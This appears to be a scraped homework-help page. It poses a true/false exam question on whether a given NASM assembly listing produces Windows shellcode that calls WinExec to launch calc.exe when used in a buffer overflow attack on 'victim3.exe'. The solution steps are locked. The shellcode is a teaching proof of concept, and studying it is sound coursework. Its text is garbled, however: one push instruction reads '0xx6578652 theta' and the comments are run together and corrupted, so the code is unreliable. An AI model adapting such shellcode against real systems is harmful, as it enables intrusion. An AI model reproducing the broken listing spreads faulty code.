Question: QUESTION 3 9 The following vulnerable code victim 3 . c has a buffer overflow vulnerability.We use arwin and get WinExec's address as 7 6

QUESTION 39
The following vulnerable code victim 3.c has a buffer overflow vulnerability.We use arwin and get WinExec's address as 7684cf20h. The following assembly can be used to generate the shellcode (True or False?). A malcious string that contains the shellcode can be crafted to attack the vulnerable code victim3.exe above.;Assemble: nasm.exe f win32 calc-shell.asm -o calc-shell.obj;LINK: GoLink.exe /console /entry_start calc-shell.obj;IF THE obj FILE IS NOT CREATED WITH THE -f win32 GoLink will COMPLAIN; Tested and coded on Win10[BITS 32] ; BITS: Specifying Target Processor Mode 32 bits[SECTION .text]global_start ; declare entry point_start:;Put the string "calc.exelo" onto the stackxor ecx,ecx ; ecx =0push ecx ; push 10(null string terminator) onto the stackpush 0xx6578652 theta; exe; little endian; 2e((.) is put at lower addresspush 0x636c6163; calc; little endianmov ecx,esp ; esp points to "calc.exelo"push 0x1 ; window stylepush ecx ; first argument for WinExecmov eax, 7684cf20h; 7684cf20h is address of WinExec;call eax ;WinExec("calc.exelo",1) True False
QUESTION 3 9 The following vulnerable code victim

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Programming Questions!